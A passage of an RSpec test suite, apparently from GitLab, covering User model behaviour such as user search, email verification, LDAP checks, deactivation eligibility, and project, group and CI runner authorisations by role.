it 'returns users with a matching username' do
expect(search_with_secondary_emails(user.username)).to eq([user])
end
it 'returns users with a partially matching username' do
expect(search_with_secondary_emails(user.username[0..2])).to eq([user])
end
it 'returns users with a matching username regardless of the casing' do
expect(search_with_secondary_emails(user.username.upcase)).to eq([user])
end
it 'returns users with a matching whole secondary email' do
expect(search_with_secondary_emails(email.email)).to eq([email.user])
end
it 'does not return users with a matching part of secondary email' do
expect(search_with_secondary_emails(email.email[1..4])).not_to include([email.user])
end
it 'returns no matches for an empty string' do
expect(search_with_secondary_emails('')).to be_empty
end
it 'returns no matches for nil' do
expect(search_with_secondary_emails(nil)).to be_empty
end
end
describe '.find_by_ssh_key_id' do
let_it_be(:user) { create(:user) }
let_it_be(:key) { create(:key, user: user) }
context 'using an existing SSH key ID' do
it 'returns the corresponding User' do
expect(described_class.find_by_ssh_key_id(key.id)).to eq(user)
end
end
it 'only performs a single query' do
key # Don't count the queries for creating the key and user
expect { described_class.find_by_ssh_key_id(key.id) }
.not_to exceed_query_limit(1)
end
context 'using an invalid SSH key ID' do
it 'returns nil' do
expect(described_class.find_by_ssh_key_id(-1)).to be_nil
end
end
end
describe '.by_login' do
let(:username) { 'John' }
let!(:user) { create(:user, username: username) }
it 'gets the correct user' do
expect(described_class.by_login(user.email.upcase)).to eq user
expect(described_class.by_login(user.email)).to eq user
expect(described_class.by_login(username.downcase)).to eq user
expect(described_class.by_login(username)).to eq user
expect(described_class.by_login(nil)).to be_nil
expect(described_class.by_login('')).to be_nil
end
end
describe '.find_by_username' do
it 'returns nil if not found' do
expect(described_class.find_by_username('JohnDoe')).to be_nil
end
it 'is case-insensitive' do
user = create(:user, username: 'JohnDoe')
expect(described_class.find_by_username('JOHNDOE')).to eq user
end
end
describe '.find_by_username!' do
it 'raises RecordNotFound' do
expect { described_class.find_by_username!('JohnDoe') }
.to raise_error(ActiveRecord::RecordNotFound)
end
it 'is case-insensitive' do
user = create(:user, username: 'JohnDoe')
expect(described_class.find_by_username!('JOHNDOE')).to eq user
end
end
describe '.find_by_full_path' do
let!(:user) { create(:user) }
context 'with a route matching the given path' do
let!(:route) { user.namespace.route }
it 'returns the user' do
expect(described_class.find_by_full_path(route.path)).to eq(user)
end
it 'is case-insensitive' do
expect(described_class.find_by_full_path(route.path.upcase)).to eq(user)
expect(described_class.find_by_full_path(route.path.downcase)).to eq(user)
end
end
context 'with a redirect route matching the given path' do
let!(:redirect_route) { user.namespace.redirect_routes.create(path: 'foo') }
context 'without the follow_redirects option' do
it 'returns nil' do
expect(described_class.find_by_full_path(redirect_route.path)).to eq(nil)
end
end
context 'with the follow_redirects option set to true' do
it 'returns the user' do
expect(described_class.find_by_full_path(redirect_route.path, follow_redirects: true)).to eq(user)
end
it 'is case-insensitive' do
expect(described_class.find_by_full_path(redirect_route.path.upcase, follow_redirects: true)).to eq(user)
expect(described_class.find_by_full_path(redirect_route.path.downcase, follow_redirects: true)).to eq(user)
end
end
end
context 'without a route or a redirect route matching the given path' do
context 'without the follow_redirects option' do
it 'returns nil' do
expect(described_class.find_by_full_path('unknown')).to eq(nil)
end
end
context 'with the follow_redirects option set to true' do
it 'returns nil' do
expect(described_class.find_by_full_path('unknown', follow_redirects: true)).to eq(nil)
end
end
end
context 'with a group route matching the given path' do
let!(:group) { create(:group, path: 'group_path') }
context 'when the group namespace has an owner_id (legacy data)' do
before do
group.update!(owner_id: user.id)
end
it 'returns nil' do
expect(described_class.find_by_full_path('group_path')).to eq(nil)
end
end
context 'when the group namespace does not have an owner_id' do
it 'returns nil' do
expect(described_class.find_by_full_path('group_path')).to eq(nil)
end
end
end
end
describe 'all_ssh_keys' do
it { is_expected.to have_many(:keys).dependent(:destroy) }
it "has all ssh keys" do
user = create :user
key = create :key, key: "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD33bWLBxu48Sev9Fert1yzEO4WGcWglWF7K/AwblIUFselOt/QdOL9DSjpQGxLagO1s9wl53STIO8qGS4Ms0EJZyIXOEFMjFJ5xmjSy+S37By4sG7SsltQEHMxtbtFOaW5LV2wCrX+rUsRNqLMamZjgjcPO0/EgGCXIGMAYW4O7cwGZdXWYIhQ1Vwy+CsVMDdPkPgBXqK7nR/ey8KMs8ho5fMNgB5hBw/AL9fNGhRw3QTD6Q12Nkhl4VZES2EsZqlpNnJttnPdp847DUsT6yuLRlfiQfz5Cn9ysHFdXObMN5VYIiPFwHeYCZp1X2S4fDZooRE8uOLTfxWHPXwrhqSH", user_id: user.id
expect(user.all_ssh_keys).to include(a_string_starting_with(key.key))
end
end
describe '#avatar_type' do
let(:user) { create(:user) }
it 'is true if avatar is image' do
user.update_attribute(:avatar, 'uploads/avatar.png')
expect(user.avatar_type).to be_truthy
end
it 'is false if avatar is html page' do
user.update_attribute(:avatar, 'uploads/avatar.html')
expect(user.avatar_type).to eq(['file format is not supported. Please try one of the following supported formats: png, jpg, jpeg, gif, bmp, tiff, ico'])
end
end
describe '#avatar_url' do
let(:user) { create(:user, :with_avatar) }
context 'when avatar file is uploaded' do
it 'shows correct avatar url' do
expect(user.avatar_url).to eq(user.avatar.url)
expect(user.avatar_url(only_path: false)).to eq([Gitlab.config.gitlab.url, user.avatar.url].join)
end
end
end
describe '#accept_pending_invitations!' do
let(:user) { create(:user, email: '[email protected]') }
let!(:project_member_invite) { create(:project_member, :invited, invite_email: user.email) }
let!(:group_member_invite) { create(:group_member, :invited, invite_email: user.email) }
let!(:external_project_member_invite) { create(:project_member, :invited, invite_email: '[email protected]') }
let!(:external_group_member_invite) { create(:group_member, :invited, invite_email: '[email protected]') }
it 'accepts all the user members pending invitations and returns the accepted_members' do
accepted_members = user.accept_pending_invitations!
expect(accepted_members).to match_array([project_member_invite, group_member_invite])
expect(group_member_invite.reload).not_to be_invite
expect(project_member_invite.reload).not_to be_invite
expect(external_project_member_invite.reload).to be_invite
expect(external_group_member_invite.reload).to be_invite
end
end
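# #all_emails also exposes the synthetic private commit email unless it is
# explicitly excluded, alongside both confirmed and unconfirmed secondary emails.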
describe '#all_emails' do
let(:user) { create(:user) }
let!(:email_confirmed) { create :email, user: user, confirmed_at: Time.now }
let!(:email_unconfirmed) { create :email, user: user }
context 'when `include_private_email` is true' do
it 'returns all emails' do
expect(user.reload.all_emails).to contain_exactly(
user.email,
user.private_commit_email,
email_unconfirmed.email,
email_confirmed.email
)
end
end
context 'when `include_private_email` is false' do
it 'does not include the private commit email' do
expect(user.reload.all_emails(include_private_email: false)).to contain_exactly(
user.email,
email_unconfirmed.email,
email_confirmed.email
)
end
end
end
describe '#verified_emails' do
let(:user) { create(:user) }
it 'returns only confirmed emails' do
email_confirmed = create :email, user: user, confirmed_at: Time.now
create :email, user: user
expect(user.verified_emails).to contain_exactly(
user.email,
user.private_commit_email,
email_confirmed.email
)
end
end
describe '#public_verified_emails' do
let(:user) { create(:user) }
it 'returns only confirmed public emails' do
email_confirmed = create :email, user: user, confirmed_at: Time.current
create :email, user: user
expect(user.public_verified_emails).to contain_exactly(
user.email,
email_confirmed.email
)
end
it 'returns confirmed public emails plus main user email when user is not confirmed' do
user = create(:user, confirmed_at: nil)
email_confirmed = create :email, user: user, confirmed_at: Time.current
create :email, user: user
expect(user.public_verified_emails).to contain_exactly(
user.email,
email_confirmed.email
)
end
end
describe '#verified_email?' do
let(:user) { create(:user) }
it 'returns true when the email is verified/confirmed' do
email_confirmed = create :email, user: user, confirmed_at: Time.now
create :email, user: user
user.reload
expect(user.verified_email?(user.email)).to be_truthy
expect(user.verified_email?(email_confirmed.email.titlecase)).to be_truthy
end
it 'returns true when user is found through private commit email' do
expect(user.verified_email?(user.private_commit_email)).to be_truthy
end
it 'returns true for an outdated private commit email' do
old_email = user.private_commit_email
user.update!(username: 'changed-username')
expect(user.verified_email?(old_email)).to be_truthy
end
it 'returns false when the email is not verified/confirmed' do
email_unconfirmed = create :email, user: user
user.reload
expect(user.verified_email?(email_unconfirmed.email)).to be_falsy
end
end
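# An LDAP re-check is only relevant when LDAP is enabled; the examples below exercise the
# hourly re-check window driven by last_credential_check_at.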
describe '#requires_ldap_check?' do
let(:user) { described_class.new }
it 'is false when LDAP is disabled' do
# Create a condition which would otherwise cause 'true' to be returned
allow(user).to receive(:ldap_user?).and_return(true)
user.last_credential_check_at = nil
expect(user.requires_ldap_check?).to be_falsey
end
context 'when LDAP is enabled' do
before do
allow(Gitlab.config.ldap).to receive(:enabled).and_return(true)
end
it 'is false for non-LDAP users' do
allow(user).to receive(:ldap_user?).and_return(false)
expect(user.requires_ldap_check?).to be_falsey
end
context 'and when the user is an LDAP user' do
before do
allow(user).to receive(:ldap_user?).and_return(true)
end
it 'is true when the user has never had an LDAP check before' do
user.last_credential_check_at = nil
expect(user.requires_ldap_check?).to be_truthy
end
it 'is true when the last LDAP check happened over 1 hour ago' do
user.last_credential_check_at = 2.hours.ago
expect(user.requires_ldap_check?).to be_truthy
end
end
end
end
context 'ldap synchronized user' do
describe '#ldap_user?' do
it 'is true if provider name starts with ldap' do
user = create(:omniauth_user, provider: 'ldapmain')
expect(user.ldap_user?).to be_truthy
end
it 'is false for other providers' do
user = create(:omniauth_user, provider: 'other-provider')
expect(user.ldap_user?).to be_falsey
end
it 'is false if no extern_uid is provided' do
user = create(:omniauth_user, extern_uid: nil)
expect(user.ldap_user?).to be_falsey
end
end
describe '#ldap_identity' do
it 'returns ldap identity' do
user = create :omniauth_user
expect(user.ldap_identity.provider).not_to be_empty
end
end
describe '#ldap_block' do
let(:user) { create(:omniauth_user, provider: 'ldapmain', name: 'John Smith') }
it 'blocks the user, flagging the action as coming from ldap' do
user.ldap_block
expect(user.blocked?).to be_truthy
expect(user.ldap_blocked?).to be_truthy
end
context 'on a read-only instance' do
before do
allow(Gitlab::Database).to receive(:read_only?).and_return(true)
end
it 'does not block user' do
user.ldap_block
expect(user.blocked?).to be_falsey
expect(user.ldap_blocked?).to be_falsey
end
end
end
end
describe '#ultraauth_user?' do
it 'is true if provider is ultraauth' do
user = create(:omniauth_user, provider: 'ultraauth')
expect(user.ultraauth_user?).to be_truthy
end
it 'is false with another provider' do
user = create(:omniauth_user, provider: 'not-ultraauth')
expect(user.ultraauth_user?).to be_falsey
end
it 'is false if no extern_uid is provided' do
user = create(:omniauth_user, extern_uid: nil)
expect(user.ultraauth_user?).to be_falsey
end
end
describe '#full_website_url' do
let(:user) { create(:user) }
it 'begins with http if website url omits it' do
user.website_url = 'test.com'
expect(user.full_website_url).to eq 'http://test.com'
end
it 'begins with http if website url begins with http' do
user.website_url = 'http://test.com'
expect(user.full_website_url).to eq 'http://test.com'
end
it 'begins with https if website url begins with https' do
user.website_url = 'https://test.com'
expect(user.full_website_url).to eq 'https://test.com'
end
end
describe '#short_website_url' do
let(:user) { create(:user) }
it 'does not begin with http if website url omits it' do
user.website_url = 'test.com'
expect(user.short_website_url).to eq 'test.com'
end
it 'does not begin with http if website url begins with http' do
user.website_url = 'http://test.com'
expect(user.short_website_url).to eq 'test.com'
end
it 'does not begin with https if website url begins with https' do
user.website_url = 'https://test.com'
expect(user.short_website_url).to eq 'test.com'
end
end
describe '#sanitize_attrs' do
let(:user) { build(:user, name: 'test & user', skype: 'test&user') }
it 'encodes HTML entities in the Skype attribute' do
expect { user.sanitize_attrs }.to change { user.skype }.to('test&amp;user')
end
it 'does not encode HTML entities in the name attribute' do
expect { user.sanitize_attrs }.not_to change { user.name }
end
end
describe '#starred?' do
it 'determines if user starred a project' do
user = create :user
project1 = create(:project, :public)
project2 = create(:project, :public)
expect(user.starred?(project1)).to be_falsey
expect(user.starred?(project2)).to be_falsey
star1 = UsersStarProject.create!(project: project1, user: user)
expect(user.starred?(project1)).to be_truthy
expect(user.starred?(project2)).to be_falsey
star2 = UsersStarProject.create!(project: project2, user: user)
expect(user.starred?(project1)).to be_truthy
expect(user.starred?(project2)).to be_truthy
star1.destroy
expect(user.starred?(project1)).to be_falsey
expect(user.starred?(project2)).to be_truthy
star2.destroy
expect(user.starred?(project1)).to be_falsey
expect(user.starred?(project2)).to be_falsey
end
end
describe '#toggle_star' do
it 'toggles stars' do
user = create :user
project = create(:project, :public)
expect(user.starred?(project)).to be_falsey
user.toggle_star(project)
expect(user.starred?(project)).to be_truthy
user.toggle_star(project)
expect(user.starred?(project)).to be_falsey
end
end
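# The private commit email is the no-reply address generated for the user; only that exact
# address is expected to resolve here, not the user's regular email.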
describe '.find_by_private_commit_email' do
context 'with email' do
let_it_be(:user) { create(:user) }
it 'returns user through private commit email' do
expect(described_class.find_by_private_commit_email(user.private_commit_email)).to eq(user)
end
it 'returns nil when email other than private_commit_email is used' do
expect(described_class.find_by_private_commit_email(user.email)).to be_nil
end
end
it 'returns nil when email is nil' do
expect(described_class.find_by_private_commit_email(nil)).to be_nil
end
end
describe '#sort_by_attribute' do
before do
described_class.delete_all
@user = create :user, created_at: Date.today, current_sign_in_at: Date.today, name: 'Alpha'
@user1 = create :user, created_at: Date.today - 1, current_sign_in_at: Date.today - 1, name: 'Omega'
@user2 = create :user, created_at: Date.today - 2, name: 'Beta'
end
context 'when sort by recent_sign_in' do
let(:users) { described_class.sort_by_attribute('recent_sign_in') }
it 'sorts users by recent sign-in time' do
expect(users.first).to eq(@user)
expect(users.second).to eq(@user1)
end
it 'pushes users who never signed in to the end' do
expect(users.third).to eq(@user2)
end
end
context 'when sort by oldest_sign_in' do
let(:users) { described_class.sort_by_attribute('oldest_sign_in') }
it 'sorts users by the oldest sign-in time' do
expect(users.first).to eq(@user1)
expect(users.second).to eq(@user)
end
it 'pushes users who never signed in to the end' do
expect(users.third).to eq(@user2)
end
end
it 'sorts users in descending order by their creation time' do
expect(described_class.sort_by_attribute('created_desc').first).to eq(@user)
end
it 'sorts users in ascending order by their creation time' do
expect(described_class.sort_by_attribute('created_asc').first).to eq(@user2)
end
it 'sorts users by id in descending order when nil is passed' do
expect(described_class.sort_by_attribute(nil).first).to eq(@user2)
end
end
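# #last_active_at should report the most recent of last_activity_on and current_sign_in_at,
# falling back to nil when neither is set.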
describe "#last_active_at" do
let(:last_activity_on) { 5.days.ago.to_date }
let(:current_sign_in_at) { 8.days.ago }
context 'for a user that has `last_activity_on` set' do
let(:user) { create(:user, last_activity_on: last_activity_on) }
it 'returns `last_activity_on` with current time zone' do
expect(user.last_active_at).to eq(last_activity_on.to_time.in_time_zone)
end
end
context 'for a user that has `current_sign_in_at` set' do
let(:user) { create(:user, current_sign_in_at: current_sign_in_at) }
it 'returns `current_sign_in_at`' do
expect(user.last_active_at).to eq(current_sign_in_at)
end
end
context 'for a user that has both `current_sign_in_at` & `last_activity_on` set' do
let(:user) { create(:user, current_sign_in_at: current_sign_in_at, last_activity_on: last_activity_on) }
it 'returns the latest among `current_sign_in_at` & `last_activity_on`' do
latest_event = [current_sign_in_at, last_activity_on.to_time.in_time_zone].max
expect(user.last_active_at).to eq(latest_event)
end
end
context 'for a user that does not have both `current_sign_in_at` & `last_activity_on` set' do
let(:user) { create(:user, current_sign_in_at: nil, last_activity_on: nil) }
it 'returns nil' do
expect(user.last_active_at).to eq(nil)
end
end
end
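# Deactivation eligibility is driven by User::MINIMUM_INACTIVE_DAYS: only active users with no
# activity or sign-in inside that window qualify.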
describe "#can_be_deactivated?" do
let(:activity) { {} }
let(:user) { create(:user, name: 'John Smith', **activity) }
let(:day_within_minimum_inactive_days_threshold) { User::MINIMUM_INACTIVE_DAYS.pred.days.ago }
let(:day_outside_minimum_inactive_days_threshold) { User::MINIMUM_INACTIVE_DAYS.next.days.ago }
shared_examples 'not eligible for deactivation' do
it 'returns false' do
expect(user.can_be_deactivated?).to be_falsey
end
end
shared_examples 'eligible for deactivation' do
it 'returns true' do
expect(user.can_be_deactivated?).to be_truthy
end
end
context "a user who is not active" do
before do
user.block
end
it_behaves_like 'not eligible for deactivation'
end
context 'a user who has activity within the specified minimum inactive days' do
let(:activity) { { last_activity_on: day_within_minimum_inactive_days_threshold } }
it_behaves_like 'not eligible for deactivation'
end
context 'a user who has signed in within the specified minimum inactive days' do
let(:activity) { { current_sign_in_at: day_within_minimum_inactive_days_threshold } }
it_behaves_like 'not eligible for deactivation'
end
context 'a user who has no activity within the specified minimum inactive days' do
let(:activity) { { last_activity_on: day_outside_minimum_inactive_days_threshold } }
it_behaves_like 'eligible for deactivation'
end
context 'a user who has not signed in within the specified minimum inactive days' do
let(:activity) { { current_sign_in_at: day_outside_minimum_inactive_days_threshold } }
it_behaves_like 'eligible for deactivation'
end
end
describe "#contributed_projects" do
subject { create(:user) }
let!(:project1) { create(:project) }
let!(:project2) { fork_project(project3) }
let!(:project3) { create(:project) }
let!(:merge_request) { create(:merge_request, source_project: project2, target_project: project3, author: subject) }
let!(:push_event) { create(:push_event, project: project1, author: subject) }
let!(:merge_event) { create(:event, :created, project: project3, target: merge_request, author: subject) }
before do
project1.add_maintainer(subject)
project2.add_maintainer(subject)
end
it "includes IDs for projects the user has pushed to" do
expect(subject.contributed_projects).to include(project1)
end
it "includes IDs for projects the user has had merge requests merged into" do
expect(subject.contributed_projects).to include(project3)
end
it "doesn't include IDs for unrelated projects" do
expect(subject.contributed_projects).not_to include(project2)
end
end
describe '#fork_of' do
let(:user) { create(:user) }
it "returns a user's fork of a project" do
project = create(:project, :public)
user_fork = fork_project(project, user, namespace: user.namespace)
expect(user.fork_of(project)).to eq(user_fork)
end
it 'returns nil if the project does not have a fork network' do
project = create(:project)
expect(user.fork_of(project)).to be_nil
end
end
describe '#can_be_removed?' do
subject { create(:user) }
context 'no owned groups' do
it { expect(subject.can_be_removed?).to be_truthy }
end
context 'has owned groups' do
before do
group = create(:group)
group.add_owner(subject)
end
it { expect(subject.can_be_removed?).to be_falsey }
end
end
describe "#recent_push" do
let(:user) { build(:user) }
let(:project) { build(:project) }
let(:event) { build(:push_event) }
it 'returns the last push event for the user' do
expect_any_instance_of(Users::LastPushEventService)
.to receive(:last_event_for_user)
.and_return(event)
expect(user.recent_push).to eq(event)
end
it 'returns the last push event for a project when one is given' do
expect_any_instance_of(Users::LastPushEventService)
.to receive(:last_event_for_project)
.and_return(event)
expect(user.recent_push(project)).to eq(event)
end
end
describe '#authorized_groups' do
let!(:user) { create(:user) }
let!(:private_group) { create(:group) }
let!(:child_group) { create(:group, parent: private_group) }
let!(:project_group) { create(:group) }
let!(:project) { create(:project, group: project_group) }
before do
private_group.add_user(user, Gitlab::Access::MAINTAINER)
project.add_maintainer(user)
end
subject { user.authorized_groups }
it { is_expected.to contain_exactly private_group, project_group }
end
describe '#membership_groups' do
let!(:user) { create(:user) }
let!(:parent_group) { create(:group) }
let!(:child_group) { create(:group, parent: parent_group) }
before do
parent_group.add_user(user, Gitlab::Access::MAINTAINER)
end
subject { user.membership_groups }
it { is_expected.to contain_exactly parent_group, child_group }
end
describe '#authorizations_for_projects' do
let!(:user) { create(:user) }
subject { Project.where("EXISTS (?)", user.authorizations_for_projects) }
it 'includes projects that belong to a user, but no other projects' do
owned = create(:project, :private, namespace: user.namespace)
member = create(:project, :private).tap { |p| p.add_maintainer(user) }
other = create(:project)
expect(subject).to include(owned)
expect(subject).to include(member)
expect(subject).not_to include(other)
end
it 'includes projects a user has access to, but no other projects' do
other_user = create(:user)
accessible = create(:project, :private, namespace: other_user.namespace) do |project|
project.add_developer(user)
end
other = create(:project)
expect(subject).to include(accessible)
expect(subject).not_to include(other)
end
context 'with min_access_level' do
let!(:user) { create(:user) }
let!(:project) { create(:project, :private, namespace: user.namespace) }
before do
project.add_developer(user)
end
subject { Project.where("EXISTS (?)", user.authorizations_for_projects(min_access_level: min_access_level)) }
context 'when developer access' do
let(:min_access_level) { Gitlab::Access::DEVELOPER }
it 'includes projects a user has access to' do
expect(subject).to include(project)
end
end
context 'when owner access' do
let(:min_access_level) { Gitlab::Access::OWNER }
it 'does not include projects with higher access level' do
expect(subject).not_to include(project)
end
end
end
end
describe '#authorized_projects', :delete do
context 'with a minimum access level' do
it 'includes projects for which the user is an owner' do
user = create(:user)
project = create(:project, :private, namespace: user.namespace)
expect(user.authorized_projects(Gitlab::Access::REPORTER))
.to contain_exactly(project)
end
it 'includes projects for which the user is a maintainer' do
user = create(:user)
project = create(:project, :private)
project.add_maintainer(user)
expect(user.authorized_projects(Gitlab::Access::REPORTER))
.to contain_exactly(project)
end
end
it "includes user's personal projects" do
user = create(:user)
project = create(:project, :private, namespace: user.namespace)
expect(user.authorized_projects).to include(project)
end
it "includes personal projects user has been given access to" do
user1 = create(:user)
user2 = create(:user)
project = create(:project, :private, namespace: user1.namespace)
project.add_developer(user2)
expect(user2.authorized_projects).to include(project)
end
it "includes projects of groups user has been added to" do
group = create(:group)
project = create(:project, group: group)
user = create(:user)
group.add_developer(user)
expect(user.authorized_projects).to include(project)
end
it "does not include projects of groups user has been removed from" do
group = create(:group)
project = create(:project, group: group)
user = create(:user)
member = group.add_developer(user)
expect(user.authorized_projects).to include(project)
member.destroy
expect(user.authorized_projects).not_to include(project)
end
it "includes projects shared with user's group" do
user = create(:user)
project = create(:project, :private)
group = create(:group)
group.add_reporter(user)
project.project_group_links.create(group: group)
expect(user.authorized_projects).to include(project)
end
it "does not include destroyed projects user had access to" do
user1 = create(:user)
user2 = create(:user)
project = create(:project, :private, namespace: user1.namespace)
project.add_developer(user2)
expect(user2.authorized_projects).to include(project)
project.destroy
expect(user2.authorized_projects).not_to include(project)
end
it "does not include projects of destroyed groups user had access to" do
group = create(:group)
project = create(:project, namespace: group)
user = create(:user)
group.add_developer(user)
expect(user.authorized_projects).to include(project)
group.destroy
expect(user.authorized_projects).not_to include(project)
end
end
describe '#projects_where_can_admin_issues' do
let(:user) { create(:user) }
it 'includes projects for which the user access level is above or equal to reporter' do
reporter_project = create(:project) { |p| p.add_reporter(user) }
developer_project = create(:project) { |p| p.add_developer(user) }
maintainer_project = create(:project) { |p| p.add_maintainer(user) }
expect(user.projects_where_can_admin_issues.to_a).to match_array([maintainer_project, developer_project, reporter_project])
expect(user.can?(:admin_issue, maintainer_project)).to eq(true)
expect(user.can?(:admin_issue, developer_project)).to eq(true)
expect(user.can?(:admin_issue, reporter_project)).to eq(true)
end
it 'does not include projects for which the user access level is below reporter' do
project = create(:project)
guest_project = create(:project) { |p| p.add_guest(user) }
expect(user.projects_where_can_admin_issues.to_a).to be_empty
expect(user.can?(:admin_issue, guest_project)).to eq(false)
expect(user.can?(:admin_issue, project)).to eq(false)
end
it 'does not include archived projects' do
project = create(:project, :archived)
expect(user.projects_where_can_admin_issues.to_a).to be_empty
expect(user.can?(:admin_issue, project)).to eq(false)
end
it 'does not include projects for which issues are disabled' do
project = create(:project, :issues_disabled)
expect(user.projects_where_can_admin_issues.to_a).to be_empty
expect(user.can?(:admin_issue, project)).to eq(false)
end
end
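# The shared examples below describe which runners a user can "own" depending on their role
# (owner, maintainer, developer, reporter, guest) within the relevant project or group.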
describe '#ci_owned_runners' do
let(:user) { create(:user) }
shared_examples :nested_groups_owner do
context 'when the user is the owner of a multi-level group' do
before do
set_permissions_for_users
end
it 'loads all the runners in the tree of groups' do
expect(user.ci_owned_runners).to contain_exactly(runner, group_runner)
end
end
end
shared_examples :group_owner do
context 'when the user is the owner of a one level group' do
before do
group.add_owner(user)
end
it 'loads the runners in the group' do
expect(user.ci_owned_runners).to contain_exactly(group_runner)
end
end
end
shared_examples :project_owner do
context 'when the user is the owner of a project' do
it 'loads the runner belonging to the project' do
expect(user.ci_owned_runners).to contain_exactly(runner)
end
end
end
shared_examples :project_member do
context 'when the user is a maintainer' do
before do
add_user(:maintainer)
end
it 'loads the runners of the project' do
expect(user.ci_owned_runners).to contain_exactly(project_runner)
end
end
context 'when the user is a developer' do
before do
add_user(:developer)
end
it 'does not load any runner' do
expect(user.ci_owned_runners).to be_empty
end
end
context 'when the user is a reporter' do
before do
add_user(:reporter)
end
it 'does not load any runner' do
expect(user.ci_owned_runners).to be_empty
end
end
context 'when the user is a guest' do
before do
add_user(:guest)
end
it 'does not load any runner' do
expect(user.ci_owned_runners).to be_empty
end
end
end
shared_examples :group_member do
context 'when the user is a maintainer' do
before do
add_user(:maintainer)
end
it 'does not load the runners of the group' do
expect(user.ci_owned_runners).to be_empty
end
end
context 'when the user is a developer' do
before do
add_user(:developer)
end
it 'does not load any runner' do
expect(user.ci_owned_runners).to be_empty
end
end
context 'when the user is a reporter' do
before do
add_user(:reporter)
end
it 'does not load any runner' do
expect(user.ci_owned_runners).to be_empty
end
end
context 'when the user is a guest' do
before do
add_user(:guest)
end
it 'does not load any runner' do
expect(user.ci_owned_runners).to be_empty
end
end
end
context 'without any projects nor groups' do
it 'does not load any runner' do
expect(user.ci_owned_runners).to be_empty
end
end
context 'with runner in a personal project' do
let!(:namespace) { create(:namespace, owner: user) }
let!(:project) { create(:project, namespace: namespace) }
let!(:runner) { create(:ci_runner, :project, projects: [project]) }
it_behaves_like :project_owner
end
context 'with group runner in a non owned group' do
let!(:group) { create(:group) }
let!(:runner) { create(:ci_runner, :group, groups: [group]) }
def add_user(access)
group.add_user(user, access)
end
it_behaves_like :group_member
end
context 'with group runner in an owned group' do
let!(:group) { create(:group) }
let!(:group_runner) { create(:ci_runner, :group, groups: [group]) }
it_behaves_like :group_owner
end
context 'with group runner in an owned group and group runner in a different owner subgroup' do
let!(:group) { create(:group) }
let!(:runner) { create(:ci_runner, :group, groups: [group]) }
let!(:subgroup) { create(:group, parent: group) }
let!(:group_runner) { create(:ci_runner, :group, groups: [subgroup]) }
let!(:another_user) { create(:user) }
def set_permissions_for_users
group.add_owner(user)
subgroup.add_owner(another_user)
end
it_behaves_like :nested_groups_owner
end
context 'with personal project runner in an owned group and a group runner in that same group' do
let!(:group) { create(:group) }
let!(:group_runner) { create(:ci_runner, :group, groups: [group]) }
let!(:project) { create(:project, group: group) }
let!(:runner) { create(:ci_runner, :project, projects: [project]) }
def set_permissions_for_users
group.add_owner(user)
end
it_behaves_like :nested_groups_owner
end
context 'with personal project runner in an owned group and a group runner in a subgroup' do
let!(:group) { create(:group) }
let!(:subgroup) { create(:group, parent: group) }
let!(:group_runner) { create(:ci_runner, :group, groups: [subgroup]) }
let!(:project) { create(:project, group: group) }
let!(:runner) { create(:ci_runner, :project, projects: [project]) }
def set_permissions_for_users
group.add_owner(user)
end
it_behaves_like :nested_groups_owner
end
context 'with personal project runner in an owned group in an owned namespace and a group runner in that group' do
let!(:namespace) { create(:namespace, owner: user) }
let!(:group) { create(:group) }
let!(:group_runner) { create(:ci_runner, :group, groups: [group]) }
let!(:project) { create(:project, namespace: namespace, group: group) }
let!(:runner) { create(:ci_runner, :project, projects: [project]) }
def set_permissions_for_users
group.add_owner(user)
end
it_behaves_like :nested_groups_owner
end
context 'with personal project runner in an owned namespace, an owned group, a subgroup and a group runner in that subgroup' do
let!(:namespace) { create(:namespace, owner: user) }
let!(:group) { create(:group) }
let!(:subgroup) { create(:group, parent: group) }
let!(:group_runner) { create(:ci_runner, :group, groups: [subgroup]) }
let!(:project) { create(:project, namespace: namespace, group: group) }
let!(:runner) { create(:ci_runner, :project, projects: [project]) }
def set_permissions_for_users
group.add_owner(user)
end
it_behaves_like :nested_groups_owner
end
context 'with a project runner that belongs to projects in a group that is not owned' do
let!(:group) { create(:group) }
let!(:project) { create(:project, group: group) }
let!(:project_runner) { create(:ci_runner, :project, projects: [project]) }
def add_user(access)
project.add_user(user, access)
end
it_behaves_like :project_member
end
context 'with project runners that belong to projects that do not belong to any group' do
let!(:project) { create(:project) }
let!(:runner) { create(:ci_runner, :project, projects: [project]) }
it 'does not load any runner' do
expect(user.ci_owned_runners).to be_empty
end
end
context 'with a group runner that belongs to a subgroup of a group owned by another user' do
let!(:group) { create(:group) }
let!(:subgroup) { create(:group, parent: group) }
let!(:runner) { create(:ci_runner, :group, groups: [subgroup]) }
let!(:another_user) { create(:user) }
def add_user(access)
subgroup.add_user(user, access)
group.add_user(another_user, :owner)
end
it_behaves_like :group_member
end
end
describe '#projects_with_reporter_access_limited_to' do
let(:project1) { create(:project) }
let(:project2) { create(:project) }
let(:user) { create(:user) }
before do
project1.add_reporter(user)
project2.add_guest(user)
end
it 'returns the projects when using a single project ID' do
projects = user.projects_with_reporter_access_limited_to(project1.id)
expect(projects).to eq([project1])
end
it 'returns the projects when using an Array of project IDs' do
projects = user.projects_with_reporter_access_limited_to([project1.id])
expect(projects).to eq([project1])
end
it 'returns the projects when using an ActiveRecord relation' do
projects = user
.projects_with_reporter_access_limited_to(Project.select(:id))
expect(projects).to eq([project1])
end
it 'does not return projects you do not have reporter access to' do
projects = user.projects_with_reporter_access_limited_to(project2.id)
expect(projects).to be_empty
end
end
describe '#all_expanded_groups' do
# Group names are chosen so that a prefix such as foo/bar would also match foo/barbaz, not just foo/bar and foo/bar/baz.
let!(:user) { create(:user) }
# group
# _______ (foo) _______
# | |
# | |
# nested_group_1 nested_group_2
# (bar) (barbaz)
# | |
# | |
# nested_group_1_1 nested_group_2_1
# (baz) (baz)
#
let!(:group) { create :group }
let!(:nested_group_1) { create :group, parent: group, name: 'bar' }
let!(:nested_group_1_1) { create :group, parent: nested_group_1, name: 'baz' }
let!(:nested_group_2) { create :group, parent: group, name: 'barbaz' }
let!(:nested_group_2_1) { create :group, parent: nested_group_2, name: 'baz' }
subject { user.all_expanded_groups }
context 'user is not a member of any group' do
it 'returns an empty array' do
is_expected.to eq([])
end
end
context 'user is member of all groups' do
before do
group.add_reporter(user)
nested_group_1.add_developer(user)
nested_group_1_1.add_maintainer(user)
nested_group_2.add_developer(user)
nested_group_2_1.add_maintainer(user)
end
it 'returns all groups' do
is_expected.to match_array [
group,
nested_group_1, nested_group_1_1,
nested_group_2, nested_group_2_1
]
end
end
context 'user is member of the top group' do
before do
group.add_owner(user)
end
it 'returns all groups' do
is_expected.to match_array [
group,
nested_group_1, nested_group_1_1,
